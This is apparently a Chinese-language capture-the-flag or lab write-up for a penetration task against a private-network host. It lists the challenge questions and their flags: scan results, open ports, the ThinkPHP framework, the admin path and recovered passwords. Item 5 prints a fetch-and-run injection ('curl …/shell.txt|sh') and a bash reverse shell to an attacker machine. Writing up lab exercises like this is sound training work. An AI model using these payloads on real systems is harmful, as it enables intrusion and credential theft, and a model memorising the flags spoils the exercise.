地址:172.16.1.155
1.扫描目标服务器所有开放的版本信息,并且将Running字段后的信息进行提交(如Linux3.8.1|3.8.1)
使用namp进行扫描
flag{1.9.15.1}
2.请将收集到的Web端口按照从小到大顺序依次排列后进行提交。(如21,22,23)
flag{21,22,80,443,9080,30000}
3.将收集到的网站框架名称进行提交。(如:Struts2 V1.1.2RPO)
flag{ThinkPHP V6.0.12LTS}
4.将收集到的网址后台访问路径进行提交,注意IP为网站的真实IP地址。(如 http://IP/admin/login.php)
flag{http://172.16.1.155/admin/Login/index.html}
5.寻找该站点当前路径中存在的文件上传漏洞页面,并且将该页面的url进行提交,注意IP为网站的真实IP地 址。(如http://IP/uploads**.com)
通过引导进入系统看到了这个页面rw init=/bin/bash
还有一个uploads12.php.bak页面我们看看
查看源码发现已经传入了木马我们直接连接结果连接不上我们可以进行反弹shell
aaa=curl 172.16.1.128/shell.txt|sh
kali本地再写一个shell.txt
bash -i >& /dev/tcp/172.16.1.128/1111 0>&1
再终端里面写入一句话木马
flag{http://172.16.1.155/uploads12.php}
6.查询systemd-network用户的uid号,将查询的结果进行提交
7.获取到该站点的phpMyadmin的访问路径,注意IP为网站的真实IP地址。(如: http://IP:8888/3247)
拿到webshell后发现phpmyadmin目录
8.针对网站进行渗透,找到网站后台登录账号以及密码。
直接下载
发现账号密码
flag{admin,yx12345678}
9.查看root路径下的phps.txt文件内容,将密码字段进行提交。(如1233211123)
数据库的配置文件database.php发现数据库密码,使用账号games,密码为数据库密码Yx888888_ ssh登陆
10.查看“shadow”文件uid为1的账号内容,并且将该用户内容的整行数据进行提交。
flag{bin:*:18353:0:99999:7:::}
Comments NOTHING